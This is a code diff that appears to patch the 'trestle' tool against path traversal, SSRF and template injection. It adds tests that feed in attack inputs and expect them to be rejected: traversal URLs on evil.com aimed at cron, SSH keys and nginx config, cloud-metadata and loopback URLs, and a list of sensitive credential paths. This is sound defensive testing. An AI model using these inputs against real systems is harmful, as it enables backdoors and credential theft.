    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, aws_path, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_blocks_docker_config(self, tmp_path: pathlib.Path) -> None:
    +        """Test that .docker config is blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        docker_path = pathlib.Path('/home/user/.docker/config.json')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, docker_path, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_blocks_kube_config(self, tmp_path: pathlib.Path) -> None:
    +        """Test that .kube config is blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        kube_path = pathlib.Path('/home/user/.kube/config')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, kube_path, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_blocks_proc_environ(self, tmp_path: pathlib.Path) -> None:
    +        """Test that /proc/self/environ is blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        proc_path = pathlib.Path('/proc/self/environ')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, proc_path, allow_outside_workspace=True)
    +
    +    def test_validate_local_file_path_blocks_windows_system32(self, tmp_path: pathlib.Path) -> None:
    +        """Test that Windows System32 is blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        win_path = pathlib.Path('C:\\Windows\\System32\\config\\SAM')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, win_path, allow_outside_workspace=True)
    +
    +    def test_validate_local_file_path_blocks_windows_credentials(self, tmp_path: pathlib.Path) -> None:
    +        """Test that Windows credentials are blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        cred_path = pathlib.Path('C:\\Users\\user\\AppData\\Local\\Microsoft\\Credentials\\secret')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, cred_path, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_blocks_var_log(self, tmp_path: pathlib.Path) -> None:
    +        """Test that /var/log is blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        log_path = pathlib.Path('/var/log/auth.log')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, log_path, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_blocks_mysql_data(self, tmp_path: pathlib.Path) -> None:
    +        """Test that MySQL data directory is blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        mysql_path = pathlib.Path('/var/lib/mysql/users.MYD')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, mysql_path, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_case_insensitive(self, tmp_path: pathlib.Path) -> None:
    +        """Test that sensitive path checking is case-insensitive."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        # Test uppercase variations
    +        passwd_upper = pathlib.Path('/ETC/PASSWD')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, passwd_upper, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_checks_original_and_resolved(self, tmp_path: pathlib.Path) -> None:
    +        """Test that both original and resolved paths are checked for sensitive patterns."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        # Create a path that might resolve differently
    +        # The validator checks both the original string and resolved path
    +        sensitive_path = pathlib.Path('/home/user/.ssh/authorized_keys')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, sensitive_path, allow_outside_workspace=True)
    +
    +
    +class TestHTTPSFetcherPathTraversal:
    +    """Test HTTPSFetcher protection against path traversal attacks."""
    +
    +    def test_https_fetcher_blocks_path_traversal(self, tmp_path: pathlib.Path) -> None:
    +        """Test that HTTPSFetcher blocks path traversal in cache paths."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Malicious URL with path traversal
    +        evil_url = 'https://evil.com/../../../../../../../tmp/pwned.json'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, evil_url)
    +
    +    def test_https_fetcher_allows_normal_paths(self, tmp_path: pathlib.Path) -> None:
    +        """Test that HTTPSFetcher allows normal paths without traversal."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Normal URL without traversal
    +        normal_url = 'https://example.com/catalogs/nist/catalog.json'
    +
    +        # Should not raise
    +        fetcher = HTTPSFetcher(tmp_path, normal_url)
    +
    +        # Verify cache path is within cache directory
    +        cache_dir = tmp_path / '.trestle' / 'cache'
    +        assert str(fetcher._cached_object_path).startswith(str(cache_dir))
    +
    +    def test_https_fetcher_blocks_embedded_traversal(self, tmp_path: pathlib.Path) -> None:
    +        """Test that embedded path traversal sequences are blocked."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # URL with embedded traversal should be blocked
    +        url = 'https://example.com/path/../data/file.json'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, url)
    +
    +
    +class TestSFTPFetcherPathTraversal:
    +    """Test SFTPFetcher protection against path traversal attacks."""
    +
    +    def test_sftp_fetcher_blocks_path_traversal(self, tmp_path: pathlib.Path) -> None:
    +        """Test that SFTPFetcher blocks path traversal in cache paths."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Malicious SFTP URL with path traversal
    +        evil_url = 'sftp://evil.com/../../../../../../../tmp/pwned.json'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            SFTPFetcher(tmp_path, evil_url)
    +
    +    def test_sftp_fetcher_allows_normal_paths(self, tmp_path: pathlib.Path) -> None:
    +        """Test that SFTPFetcher allows normal paths without traversal."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Normal SFTP URL without traversal
    +        normal_url = 'sftp://example.com/data/catalog.json'
    +
    +        # Should not raise
    +        fetcher = SFTPFetcher(tmp_path, normal_url)
    +
    +        # Verify cache path is within cache directory
    +        cache_dir = tmp_path / '.trestle' / 'cache'
    +        assert str(fetcher._cached_object_path).startswith(str(cache_dir))
    +
    +    def test_sftp_fetcher_blocks_embedded_traversal(self, tmp_path: pathlib.Path) -> None:
    +        """Test that embedded path traversal sequences are blocked."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # SFTP URL with embedded traversal should be blocked
    +        url = 'sftp://example.com/path/../data/file.json'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            SFTPFetcher(tmp_path, url)
    +
    +
    +class TestRealWorldAttackVectors:
    +    """Test real-world attack vectors from the security advisory."""
    +
    +    def test_attack_vector_cron_injection(self, tmp_path: pathlib.Path) -> None:
    +        """Test blocking of cron job injection attack vector."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Attack: Write to /etc/cron.d/backdoor
    +        evil_url = 'https://evil.com/../../../../../../../etc/cron.d/backdoor'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, evil_url)
    +
    +    def test_attack_vector_ssh_keys(self, tmp_path: pathlib.Path) -> None:
    +        """Test blocking of SSH authorized_keys injection."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Attack: Write to ~/.ssh/authorized_keys
    +        evil_url = 'https://evil.com/../../../../../../../root/.ssh/authorized_keys'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, evil_url)
    +
    +    def test_attack_vector_tmp_write(self, tmp_path: pathlib.Path) -> None:
    +        """Test blocking of arbitrary /tmp file write."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Attack: Write to /tmp/pwned.json
    +        evil_url = 'https://evil.com/../../../tmp/pwned.json'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, evil_url)
    +
    +    def test_attack_vector_config_overwrite(self, tmp_path: pathlib.Path) -> None:
    +        """Test blocking of config file overwrite."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Attack: Overwrite nginx config
    +        evil_url = 'https://evil.com/../../../../../../../etc/nginx/conf.d/evil.conf'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, evil_url)
    +
    +    def test_attack_vector_sftp_private_network(self, tmp_path: pathlib.Path) -> None:
    +        """Test blocking of SFTP path traversal to system files."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Attack: SFTP to internal host with path traversal
    +        evil_url = 'sftp://192.168.1.1/../../../../../../../etc/passwd'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            SFTPFetcher(tmp_path, evil_url)
    +
    +
    +def test_https_fetcher_blocks_ssrf_aws_metadata(tmp_path: pathlib.Path) -> None:
    +    """Test that HTTPSFetcher blocks AWS metadata endpoint."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    with pytest.raises(TrestleError, match='cloud metadata endpoints'):
    +        HTTPSFetcher(tmp_path, 'https://169.254.169.254/latest/meta-data/')
    +
    +
    +def test_https_fetcher_blocks_ssrf_gcp_metadata(tmp_path: pathlib.Path) -> None:
    +    """Test that HTTPSFetcher blocks GCP metadata endpoint."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    with pytest.raises(TrestleError, match='cloud metadata endpoints'):
    +        HTTPSFetcher(tmp_path, 'https://metadata.google.internal/computeMetadata/v1/')
    +
    +
    +def test_https_fetcher_blocks_ssrf_localhost(tmp_path: pathlib.Path) -> None:
    +    """Test that HTTPSFetcher always blocks localhost (loopback)."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    # Loopback is always blocked regardless of TRESTLE_BLOCK_PRIVATE_IPS
    +    with pytest.raises(TrestleError, match='127.0.0.0/8'):
    +        HTTPSFetcher(tmp_path, 'https://127.0.0.1:8080/')
    +
    +
    +def test_https_fetcher_blocks_ssrf_ipv6_loopback(tmp_path: pathlib.Path) -> None:
    +    """Test that HTTPSFetcher always blocks IPv6 loopback."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    # IPv6 loopback is always blocked regardless of TRESTLE_BLOCK_PRIVATE_IPS
    +    with pytest.raises(TrestleError, match='::1/128'):
    +        HTTPSFetcher(tmp_path, 'https://[::1]:8080/')
    +
    +
    +def test_https_fetcher_blocks_link_local_169_254(tmp_path: pathlib.Path) -> None:
    +    """Test that HTTPSFetcher always blocks link-local 169.254.x.x addresses."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    # Link-local is always blocked (includes metadata endpoints)
    +    with pytest.raises(TrestleError, match='169.254.0.0/16'):
    +        HTTPSFetcher(tmp_path, 'https://169.254.1.1/some/path')
    +
    +
    +def test_https_fetcher_allows_private_network_10_by_default(tmp_path: pathlib.Path) -> None:
    +    """Test that HTTPSFetcher allows 10.x.x.x private network IPs by default."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    # RFC 1918 ranges are allowed by default to support private GitLab/internal OSCAL repos
    +    # This should not raise an error (though it will fail to connect in tests)
    +    try:
    +        fetcher = HTTPSFetcher(tmp_path, 'https://10.0.0.1:8500/v1/agent/self')
    +        # If we get here, the security validation passed (connection will fail but that's expected)
    +        assert fetcher is not None
    +    except TrestleError as e:
    +        # Should not be a security error about private IPs
    +        assert '10.0.0.0/8' not in str(e) or 'TRESTLE_BLOCK_PRIVATE_IPS' in str(e)
    +
    +
    +def test_https_fetcher_blocks_private_network_10_when_configured(tmp_path: pathlib.Path, monkeypatch) -> None:
    +    """Test that HTTPSFetcher blocks 10.x.x.x when TRESTLE_BLOCK_PRIVATE_IPS is set."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    monkeypatch.setenv('TRESTLE_BLOCK_PRIVATE_IPS', 'true')
    +    with pytest.raises(TrestleError, match='10.0.0.0/8'):
    +        HTTPSFetcher(tmp_path, 'https://10.0.0.1:8500/v1/agent/self')
    +
    +
    +def test_https_fetcher_allows_private_network_192_by_default(tmp_path: pathlib.Path) -> None:
    +    """Test that HTTPSFetcher allows 192.168.x.x private network IPs by default."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    try:
    +        fetcher = HTTPSFetcher(tmp_path, 'https://192.168.1.1/admin')
    +        assert fetcher is not None
    +    except TrestleError as e:
    +        assert '192.168.0.0/16' not in str(e) or 'TRESTLE_BLOCK_PRIVATE_IPS' in str(e)
    +
    +
    +def test_https_fetcher_blocks_private_network_192_when_configured(tmp_path: pathlib.Path, monkeypatch) -> None:
    +    """Test that HTTPSFetcher blocks 192.168.x.x when TRESTLE_BLOCK_PRIVATE_IPS is set."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    monkeypatch.setenv('TRESTLE_BLOCK_PRIVATE_IPS', 'true')
    +    with pytest.raises(TrestleError, match='192.168.0.0/16'):
    +        HTTPSFetcher(tmp_path, 'https://192.168.1.1/admin')
    +
    +
    +def test_https_fetcher_allows_private_network_172_by_default(tmp_path: pathlib.Path) -> None:
    +    """Test that HTTPSFetcher allows 172.16-31.x.x private network IPs by default."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    try:
    +        fetcher = HTTPSFetcher(tmp_path, 'https://172.16.0.1/admin')
    +        assert fetcher is not None
    +    except TrestleError as e:
    +        assert '172.16.0.0/12' not in str(e) or 'TRESTLE_BLOCK_PRIVATE_IPS' in str(e)
    +
    +
    +def test_https_fetcher_blocks_private_network_172_when_configured(tmp_path: pathlib.Path, monkeypatch) -> None:
    +    """Test that HTTPSFetcher blocks 172.16-31.x.x when TRESTLE_BLOCK_PRIVATE_IPS is set."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    monkeypatch.setenv('TRESTLE_BLOCK_PRIVATE_IPS', 'true')
    +    with pytest.raises(TrestleError, match='172.16.0.0/12'):
    +        HTTPSFetcher(tmp_path, 'https://172.16.0.1/admin')
    +
    +
    +def test_sftp_fetcher_blocks_ssrf_aws_metadata(tmp_path: pathlib.Path) -> None:
    +    """Test that SFTPFetcher blocks AWS metadata endpoint."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    with pytest.raises(TrestleError, match='cloud metadata endpoints'):
    +        SFTPFetcher(tmp_path, 'sftp://169.254.169.254/latest/meta-data/')
    +
    +
    +def test_sftp_fetcher_blocks_ssrf_localhost(tmp_path: pathlib.Path) -> None:
    +    """Test that SFTPFetcher always blocks localhost (loopback)."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    # Loopback is always blocked regardless of TRESTLE_BLOCK_PRIVATE_IPS
    +    with pytest.raises(TrestleError, match='127.0.0.0/8'):
    +        SFTPFetcher(tmp_path, 'sftp://127.0.0.1:22/data/file.json')
    +
    +
    +def test_sftp_fetcher_blocks_link_local_169_254(tmp_path: pathlib.Path) -> None:
    +    """Test that SFTPFetcher always blocks link-local 169.254.x.x addresses."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    # Link-local is always blocked (includes metadata endpoints)
    +    with pytest.raises(TrestleError, match='169.254.0.0/16'):
    +        SFTPFetcher(tmp_path, 'sftp://169.254.1.1:22/some/path')
    +
    +
    +def test_https_fetcher_blocks_invalid_scheme_http(tmp_path: pathlib.Path) -> None:
    +    """Test that HTTPSFetcher blocks HTTP scheme (only HTTPS allowed)."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    with pytest.raises(TrestleError, match='Only HTTPS or SFTP schemes are allowed for remote URLs'):
    +        HTTPSFetcher(tmp_path, 'http://example.com/data.json')
    +
    +
    +def test_https_fetcher_blocks_invalid_scheme_ftp(tmp_path: pathlib.Path) -> None:
    +    """Test that HTTPSFetcher blocks FTP scheme."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    with pytest.raises(TrestleError, match='Only HTTPS or SFTP schemes are allowed for remote URLs'):
    +        HTTPSFetcher(tmp_path, 'ftp://example.com/data.json')
    +
    +
    +def test_sftp_fetcher_blocks_invalid_scheme_http(tmp_path: pathlib.Path) -> None:
    +    """Test that SFTPFetcher blocks HTTP scheme (only SFTP allowed)."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    with pytest.raises(TrestleError, match='Only HTTPS or SFTP schemes are allowed for remote URLs'):
    +        SFTPFetcher(tmp_path, 'http://example.com/data.json')
    +
    +
    +def test_url_validator_blocks_invalid_scheme(tmp_path: pathlib.Path) -> None:
    +    """Test that URLSecurityValidator blocks invalid schemes."""
    +    from trestle.core.remote.security import URLSecurityValidator
    +
    +    validator = URLSecurityValidator()
    +
    +    with pytest.raises(TrestleError, match='Only HTTPS or SFTP schemes are allowed for remote URLs'):
    +        validator.validate_url('http://example.com/data.json')
    +
    +    with pytest.raises(TrestleError, match='Only HTTPS or SFTP schemes are allowed for remote URLs'):
    +        validator.validate_url('ftp://example.com/data.json')
    +
    +    with pytest.raises(TrestleError, match='Only HTTPS or SFTP schemes are allowed for remote URLs'):
    +        validator.validate_url('gopher://example.com/data')
    +
    +
    +def test_url_validator_handles_dns_resolution_failure(tmp_path: pathlib.Path, monkeypatch) -> None:
    +    """Test that URLSecurityValidator handles DNS resolution failures gracefully."""
    +    from trestle.core.remote.security import URLSecurityValidator
    +
    +    # Mock socket.getaddrinfo to return empty list (no IPs resolved)
    +    def mock_getaddrinfo(hostname, port):
    +        return []  # Empty list - no IPs resolved
    +
    +    monkeypatch.setattr(socket, 'getaddrinfo', mock_getaddrinfo)
    +
    +    validator = URLSecurityValidator()
    +    with pytest.raises(TrestleError, match='No IP addresses resolved for hostname'):
    +        validator.validate_url('https://nonexistent.example.com/data.json')
    +
    +
    +def test_url_validator_with_allowed_domains() -> None:
    +    """Test URL validation with domain allowlist."""
    +    # Test with allowed domain - should pass
    +    validator = URLSecurityValidator(allowed_domains={'example.com', 'test.com'})
    +    # This will fail DNS resolution but that's OK - we're testing the domain check happens first
    +    try:
    +        validator.validate_url('https://example.com/path')
    +    except TrestleError as e:
    +        # Should fail on DNS resolution, not domain check
    +        assert 'not in the allowed domains list' not in str(e)
    +
    +    # Test with disallowed domain - should fail on domain check
    +    validator = URLSecurityValidator(allowed_domains={'example.com'})
    +    with pytest.raises(TrestleError, match='not in the allowed domains list'):
    +        validator.validate_url('https://other.com/path')
    +
    +
    +def test_url_validator_invalid_ip_address(monkeypatch) -> None:
    +    """Test handling of invalid IP address from getaddrinfo."""
    +
    +    def mock_getaddrinfo(hostname, port):
    +        # Return a malformed IP that will trigger ValueError in ipaddress.ip_address()
    +        return [(socket.AF_INET, socket.SOCK_STREAM, 6, '', ('not-an-ip', 0))]
    +
    +    monkeypatch.setattr(socket, 'getaddrinfo', mock_getaddrinfo)
    +
    +    validator = URLSecurityValidator()
    +    with pytest.raises(TrestleError, match='Invalid IP address'):
    +        validator.validate_url('https://example.com/path')
    +
    +
    +# Made with Bob
    
  • tests/trestle/core/remote/cache_test.py+15 6 modified
    @@ -103,11 +103,11 @@ def test_https_fetcher_fails(tmp_trestle_dir: pathlib.Path, monkeypatch: MonkeyP
         """Test the HTTPS fetcher failing."""
         monkeypatch.setenv('myusername', 'user123')
         monkeypatch.setenv('mypassword', 'somep4ss')
    -    # This syntactically valid uri points to nothing and should ConnectTimeout.
    +    # This syntactically valid uri points to localhost which is now blocked for security
    +    # The security validator should reject this before any connection attempt
         uri = 'https://{{myusername}}:{{mypassword}}@127.0.0.1/path/to/file.json'
    -    fetcher = cache.FetcherFactory.get_fetcher(tmp_trestle_dir, uri)
    -    with pytest.raises(TrestleError, match='retries exceeded'):
    -        fetcher._update_cache()
    +    with pytest.raises(TrestleError, match='127.0.0.0/8'):
    +        cache.FetcherFactory.get_fetcher(tmp_trestle_dir, uri)
     
     
     def test_https_fetcher(tmp_trestle_dir: pathlib.Path, monkeypatch: MonkeyPatch) -> None:
    @@ -204,10 +204,10 @@ def ssh_urlparse_mock(*args, **kwargs):
         fetcher = cache.FetcherFactory.get_fetcher(tmp_trestle_dir, uri)
         with pytest.raises(err.TrestleError, match='connect via SSH'):
             fetcher._update_cache()
    -    # malformed uri
    +    # malformed uri - security validator now catches urlparse errors first
         monkeypatch.setattr(SSHClient, 'connect', ssh_connect_mock)
         monkeypatch.setattr(parse, 'urlparse', ssh_urlparse_mock)
    -    with pytest.raises(err.TrestleError, match='malformed'):
    +    with pytest.raises(err.TrestleError, match='Invalid URL format'):
             _ = cache.FetcherFactory.get_fetcher(tmp_trestle_dir, uri)
     
     
    @@ -296,6 +296,15 @@ def test_fetcher_factory(tmp_trestle_dir: pathlib.Path, monkeypatch: MonkeyPatch
         fetcher = cache.FetcherFactory.get_fetcher(tmp_trestle_dir, https_uri)
         assert isinstance(fetcher, cache.HTTPSFetcher)
     
    +    # Mock DNS resolution for SFTP tests to avoid "Unable to resolve hostname" errors
    +    import socket
    +
    +    def mock_getaddrinfo(host, port, *args, **kwargs):
    +        # Return a fake IP address for any hostname
    +        return [(socket.AF_INET, socket.SOCK_STREAM, 6, '', ('192.0.2.1', 22))]
    +
    +    monkeypatch.setattr(socket, 'getaddrinfo', mock_getaddrinfo)
    +
         sftp_uri = 'sftp://user@hostname:/path/to/file.json'
         fetcher = cache.FetcherFactory.get_fetcher(tmp_trestle_dir, sftp_uri)
         assert isinstance(fetcher, cache.SFTPFetcher)
    
  • trestle/core/commands/author/jinja.py+26 33 modified
    @@ -20,16 +20,16 @@
     import operator
     import pathlib
     import re
    -import uuid
     from typing import Any, Dict, Optional
     
    -from jinja2 import ChoiceLoader, DictLoader, Environment, FileSystemLoader, Template
    +from jinja2 import Environment, FileSystemLoader, Template
     
     from ruamel.yaml import YAML
     
     from trestle.common import const, log
     from trestle.common.err import TrestleIncorrectArgsError, handle_generic_command_exception
     from trestle.common.load_validate import load_validate_model_name
    +from trestle.core.remote.security import PathSecurityValidator
     from trestle.common.model_utils import ModelUtils
     from trestle.core.catalog.catalog_interface import CatalogInterface
     from trestle.core.commands.command_docs import CommandPlusDocs
    @@ -48,8 +48,6 @@
     class JinjaCmd(CommandPlusDocs):
         """Transform an input template to an output document using jinja templating."""
     
    -    max_recursion_depth = 2
    -
         name = 'jinja'
     
         def _init_arguments(self) -> None:
    @@ -191,9 +189,7 @@ def jinja_ify(
         ) -> int:
             """Run jinja over an input file with additional booleans."""
             template_folder = pathlib.Path.cwd()
    -        jinja_env = Environment(
    -            loader=FileSystemLoader(template_folder), extensions=extensions(), trim_blocks=True, autoescape=True
    -        )
    +        jinja_env = JinjaCmd._create_jinja_environment(template_folder)
             template = jinja_env.get_template(str(r_input_file))
             # create boolean dict
             if operator.xor(bool(ssp), bool(profile)):
    @@ -228,7 +224,10 @@ def jinja_ify(
     
             output = JinjaCmd.render_template(template, lut, template_folder)
     
    +        # Validate output path to prevent path traversal
             output_file = trestle_root / r_output_file
    +        PathSecurityValidator.validate_local_path(output_file, trestle_root)
    +
             if number_captions:
                 output_file.open('w', encoding=const.FILE_ENCODING).write(_number_captions(output))
             else:
    @@ -274,14 +273,15 @@ def jinja_multiple_md(
                     control_path = catalog_interface.get_control_path(control.id)
                     for sub_dir in control_path:
                         group_dir = group_dir / sub_dir
    -                    if not group_dir.exists():
    -                        group_dir.mkdir(parents=True, exist_ok=True)
    +                    # Validate directory path to prevent path traversal before creating directories
    +                    full_group_dir = trestle_root / group_dir
    +                    PathSecurityValidator.validate_local_path(full_group_dir, trestle_root)
    +                    if not full_group_dir.exists():
    +                        full_group_dir.mkdir(parents=True, exist_ok=True)
     
                     control_writer = DocsControlWriter()
     
    -                jinja_env = Environment(
    -                    loader=FileSystemLoader(template_folder), extensions=extensions(), trim_blocks=True, autoescape=True
    -                )
    +                jinja_env = JinjaCmd._create_jinja_environment(template_folder)
                     template = jinja_env.get_template(str(r_input_file))
                     lut['catalog_interface'] = catalog_interface
                     lut['control_interface'] = ControlInterface()
    @@ -291,33 +291,26 @@ def jinja_multiple_md(
                     lut['group_title'] = group_title
                     output = JinjaCmd.render_template(template, lut, template_folder)
     
    -                output_file = trestle_root / group_dir / pathlib.Path(control.id + const.MARKDOWN_FILE_EXT)
    +                # Validate output path to prevent path traversal
    +                relative_output_path = group_dir / pathlib.Path(control.id + const.MARKDOWN_FILE_EXT)
    +                output_file = trestle_root / relative_output_path
    +                PathSecurityValidator.validate_local_path(output_file, trestle_root)
    +
                     output_file.open('w', encoding=const.FILE_ENCODING).write(output)
     
             return CmdReturnCodes.SUCCESS.value
     
         @staticmethod
    -    def render_template(template: Template, lut: Dict[str, Any], template_folder: pathlib.Path) -> str:
    -        """Render template."""
    -        new_output = template.render(**lut)
    -        output = ''
    -        # This recursion allows nesting within expressions (e.g. an expression can contain jinja templates).
    -        error_countdown = JinjaCmd.max_recursion_depth
    -        while new_output != output and error_countdown > 0:
    -            error_countdown = error_countdown - 1
    -            output = new_output
    -            random_name = uuid.uuid4()  # Should be random and not used.
    -            dict_loader = DictLoader({str(random_name): new_output})
    -            jinja_env = Environment(
    -                loader=ChoiceLoader([dict_loader, FileSystemLoader(template_folder)]),
    -                extensions=extensions(),
    -                autoescape=True,
    -                trim_blocks=True,
    -            )
    -            template = jinja_env.get_template(str(random_name))
    -            new_output = template.render(**lut)
    +    def _create_jinja_environment(template_folder: pathlib.Path) -> Environment:
    +        """Create the trusted Jinja environment used for loading template files."""
    +        return Environment(
    +            loader=FileSystemLoader(template_folder), extensions=extensions(), trim_blocks=True, autoescape=True
    +        )
     
    -        return output
    +    @staticmethod
    +    def render_template(template: Template, lut: Dict[str, Any], template_folder: pathlib.Path) -> str:
    +        """Render a trusted template exactly once to avoid recursive SSTI of untrusted data."""
    +        return template.render(**lut)
     
     
     def _number_captions(md_body: str) -> str:
    
  • trestle/core/remote/cache.py+79 7 modified
    @@ -41,6 +41,7 @@
     from trestle.common.err import TrestleError
     from trestle.core import parser
     from trestle.core.base_model import OscalBaseModel
    +from trestle.core.remote.security import PathSecurityValidator, URLSecurityValidator, get_block_private_ips_config
     
     logger = logging.getLogger(__name__)
     
    @@ -169,16 +170,29 @@ def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:
             """
             super().__init__(trestle_root, uri)
     
    +        original_uri = uri
    +        is_file_uri = uri.startswith(const.FILE_URI)
    +
             # Handle as file:/// form
    -        if uri.startswith(const.FILE_URI):
    +        if is_file_uri:
                 # strip off entire header including /
                 uri = uri[len(const.FILE_URI) :]
     
                 # if it has a drive letter don't add / to front
                 uri = uri if re.match(const.WINDOWS_DRIVE_LETTER_REGEX, uri) else '/' + uri
             elif uri.startswith(const.TRESTLE_HREF_HEADING):
    -            uri = str(trestle_root / uri[len(const.TRESTLE_HREF_HEADING) :])
    +            # Extract the path after 'trestle://'
    +            trestle_path = uri[len(const.TRESTLE_HREF_HEADING) :]
    +
    +            # Layer 1: Validate the trestle:// URI path for traversal sequences
    +            PathSecurityValidator.validate_trestle_uri_path(trestle_path)
    +
    +            uri = str(trestle_root / trestle_path)
                 self._abs_path = pathlib.Path(uri).resolve()
    +
    +            # Layer 2: Validate resolved path stays within trestle workspace
    +            PathSecurityValidator.validate_local_path(self._abs_path, self._trestle_root)
    +
                 self._cached_object_path = self._abs_path
                 return
     
    @@ -199,6 +213,13 @@ def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:
             except Exception:
                 raise TrestleError(f'The uri provided is invalid or unresolvable as a file path: {uri}')
     
    +        # Security validation for file:// URIs and relative paths
    +        # LocalFetcher is designed to access files outside workspace (e.g., test data, external catalogs)
    +        # Security is provided by blocking sensitive system files, not workspace boundaries
    +        # This prevents arbitrary file read vulnerabilities (PT-002) while allowing legitimate use
    +        logger.info(f'Validating local file access: {original_uri}')
    +        PathSecurityValidator.validate_local_file_path(self._trestle_root, self._abs_path, allow_outside_workspace=True)
    +
             # set the cached path to be the actual file path
             self._cached_object_path = self._abs_path
     
    @@ -219,6 +240,14 @@ def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:
             """Initialize HTTPS fetcher."""
             logger.debug('Initializing HTTPSFetcher')
             super().__init__(trestle_root, uri)
    +
    +        # Security validation: Check URL for SSRF vulnerabilities
    +        # Always blocks: loopback, link-local, cloud metadata endpoints
